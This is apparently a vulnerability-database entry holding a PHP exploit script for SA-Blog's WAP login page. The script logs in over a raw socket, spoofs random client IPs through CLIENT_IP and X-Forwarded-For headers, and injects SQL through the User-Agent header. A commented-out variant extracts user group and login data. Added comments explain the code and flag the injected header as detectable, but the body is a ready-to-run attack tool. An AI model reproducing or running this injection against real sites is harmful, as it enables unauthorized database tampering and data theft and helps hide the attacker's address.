SA-Blog Exp

SSV-ID: 7276
SSV-AppDir: sablog漏洞
发布时间: 2007-09-17

测试方法:

<?php
//from    loveshell.net
// Target endpoint: the blog root given on the command line plus the WAP
// login script. $argv[1..3] are read unchecked; with fewer than four
// arguments these lines raise undefined-index notices.
$url    =    $argv[1].'/wap/index.php';
$username    =    $argv[2];
$password    =    $argv[3];


// NOTE(review): none of the echo strings in this listing end in a newline
// and the banner prints on one line; presumably "\n" escapes were stripped
// when the page was extracted — confirm against the original script.
echo"    +----------------------------------------------------------------+";
echo"        Uage:    php.exe    blogurl    username    password";
echo"        example    php.exe    http://www.loveshell.net/blog    test    test";
echo"    +----------------------------------------------------------------+";


// Only the credentials are required; a missing $argv[1] is not caught here,
// and a username or password of "0" also fails this truthiness test.
if(!$username||!$password)    die;

echo"    root@localhost:Post    our    content";

// Login form body. Values are concatenated raw, not urlencode()d, so a
// username or password containing '&', '=' or '+' would be misparsed by
// the target.
$str    =    'username='.$username.'&password='.$password.'&action=login&do=login&';

// myrequest() (defined below) POSTs $str with $type defaulting to POST; the
// injection string this page is about travels in the User-Agent header that
// function hard-codes, not in this body.
$msg    =    myrequest($str,$url);
echo    $msg;

// Success is decided by grepping the raw response for the Chinese UI text
// "login successful" (登陆成功), so the check is tied to the target's locale.
if(strpos($msg,'登陆成功')!==false)    echo"    root@localhost:All    Done!!!    ";
else    echo"    root@localhost:Login    error!!!    ";
echo"    +----------------------------------------------------------------+";
echo"    Enjoy    yourself.";
echo"    +----------------------------------------------------------------+";


/**
 * Send one hand-built HTTP/1.1 request over a raw socket and return the raw
 * response (status line, headers and body, unparsed).
 *
 * $msg    request body; only sent, and counted in Content-Length, on POST.
 * $url    absolute target URL, split by initurl() below.
 * $type   1 => GET, anything else => POST (default 2).
 * $cookie placed verbatim in a Cookie header on both branches.
 *
 * Returns the response read until the peer closes the socket. When the
 * connect fails nothing is read, $resp is never assigned, and the function
 * returns null (with an undefined-variable notice).
 *
 * NOTE(review): in this listing no header line carries a "\r\n" terminator
 * and the last two fputs() calls concatenate an empty string
 * (`strlen($msg).""`, `$msg.""`); presumably the escape sequences were lost
 * when the page was extracted, so the wire format shown here is not what the
 * original script sent — confirm against the original.
 */
function    myrequest($msg,$url,$type=2,$cookie=''){
//change    type    for    post/get
    global    $sql;    // never read or written in this function
$urls    =    initurl($url);
// Random dotted-quad placed in CLIENT_IP / X_FORWARDED-FOR below, so the
// target sees a different (spoofed) client address on every request.
// Defensive takeaway: both headers are client-controlled and must not feed
// logging, rate limiting or access decisions. rand() is not a CSPRNG; that
// only matters if anything depended on unpredictability, which nothing here does.
$iprand    =    rand(1,255).'.'.rand(1,255).'.'.rand(1,255).'.'.rand(1,255);
// 3-second connect timeout; @ hides the warning and $errno/$errstr are never
// reported, so a refused connection looks the same as an empty reply. Plain
// TCP only: no ssl:// transport is used, and initurl() defaults a missing
// port to 80, so an https:// URL without a port is contacted in the clear.
$fp    =    @fsockopen($urls['host'],    $urls['port'],    $errno,    $errstr,    3);
    if($fp)    {
        if($type==1){
        // GET branch. Query string is appended verbatim; $urls[url] is the
        // normalised URL rebuilt by initurl().
        fputs($fp,    "GET    $urls[path]?$urls[query]    HTTP/1.1");
        fputs($fp,    "Host:    $urls[host]");
        fputs($fp,    "Accept:    */*");
        fputs($fp,    "Referer:    $urls[url]");
        fputs($fp,    "User-Agent:    Mozilla/4.0    (compatible;    MSIE    5.00;    Windows    98)");
        fputs($fp,    "CLIENT_IP:    $iprand");
        fputs($fp,    "X_FORWARDED-FOR:    $iprand");
        fputs($fp,    "Pragma:    no-cache");
        fputs($fp,    "Cache-Control:    no-cache");
        fputs($fp,    "Connection:    Keep-Alive");
        fputs($fp,    "Cookie:    $cookie");
        }else{
        // POST branch.
        fputs($fp,    "POST    $urls[path]?$urls[query]    HTTP/1.1");
        fputs($fp,    "Accept:    application/x-shockwave-flash,    image/gif,    image/x-xbitmap,    image/jpeg,    image/pjpeg,    */*");
        fputs($fp,    "Referer:    $urls[url]");
        fputs($fp,    "Accept-Language:    zh-cn");
        fputs($fp,    "Content-Type:    application/x-www-form-urlencoded");
//        fputs($fp,    "User-Agent:    ',1),((select    concat(0x2f,groupid,0x2f,logincount)    from    angel_users    limit    1),1,1,'211.43.206.208','123");
        // The User-Agent value is the SQL-injection string this exploit relies on
        // (a second, commented-out variant sits on the line above); presumably the
        // target stores this header in a database write without escaping it.
        // Detection note: a User-Agent containing quote characters and parentheses
        // is not a legitimate browser string and is cheap to flag in access logs
        // or at a WAF.
        fputs($fp,    "User-Agent:    ',1),('9c5b71e5',1,1,'211.43.206.202','9989581653");
        fputs($fp,    "CLIENT_IP:    $iprand");
        fputs($fp,    "X_FORWARDED-FOR:    $iprand");
        fputs($fp,    "Host:    $urls[host]");
        fputs($fp,    "Content-Length:    ".strlen($msg)."");
        fputs($fp,    "Connection:    Keep-Alive");
        fputs($fp,    "Cache-Control:    no-cache");
        fputs($fp,    "Cookie:    $cookie");
        fputs($fp,    $msg."");
        }
    }


// Read until the peer closes. No stream read timeout is set and the request
// asks for Keep-Alive, so this can block if the server holds the connection
// open. The socket is never fclose()d.
while($fp&&!feof($fp))    {
$resp    .=    fread($fp,1024);
}
return    $resp;
}


/**
 * Split $url with parse_url(), re-assemble a normalised copy under the
 * 'url' key and default the port to '80' when the URL carries none.
 *
 * Anything the caller cannot use yields array('url' => ''): strings shorter
 * than 10 bytes, input parse_url() rejects, URLs without a scheme, and the
 * file: scheme.
 *
 * @param string $url
 * @return array parse_url() components plus 'port' (string '80' when
 *               defaulted, otherwise whatever parse_url() returned) and 'url'
 */
function    initurl($url)    {
    $rejected = array('url' => '');

    // Too short to be a usable absolute URL.
    if (strlen($url) < 10) {
        return $rejected;
    }

    $parts = @parse_url($url);
    if (empty($parts) || !is_array($parts)) {
        return $rejected;
    }
    if (empty($parts['scheme']) || $parts['scheme'] === 'file') {
        return $rejected;
    }

    // Re-assemble scheme://[user[:pass]@]host[:port][path][?query][#fragment],
    // skipping every component parse_url() left empty.
    $hasCredentials = !empty($parts['user']) || !empty($parts['pass']);

    $rebuilt = $parts['scheme'] . '://';
    if (!empty($parts['user'])) {
        $rebuilt .= $parts['user'];
    }
    if (!empty($parts['pass'])) {
        $rebuilt .= ':' . $parts['pass'];
    }
    if (!empty($parts['host'])) {
        // The '@' separator is only emitted when userinfo precedes the host.
        $rebuilt .= ($hasCredentials ? '@' : '') . $parts['host'];
    }
    if (!empty($parts['port'])) {
        $rebuilt .= ':' . $parts['port'];
    }
    if (!empty($parts['path'])) {
        $rebuilt .= $parts['path'];
    }
    if (!empty($parts['query'])) {
        $rebuilt .= '?' . $parts['query'];
    }
    if (!empty($parts['fragment'])) {
        $rebuilt .= '#' . $parts['fragment'];
    }

    // Callers open a plain TCP socket to this port regardless of scheme.
    if (empty($parts['port'])) {
        $parts['port'] = '80';
    }
    $parts['url'] = $rebuilt;

    return $parts;
}
?>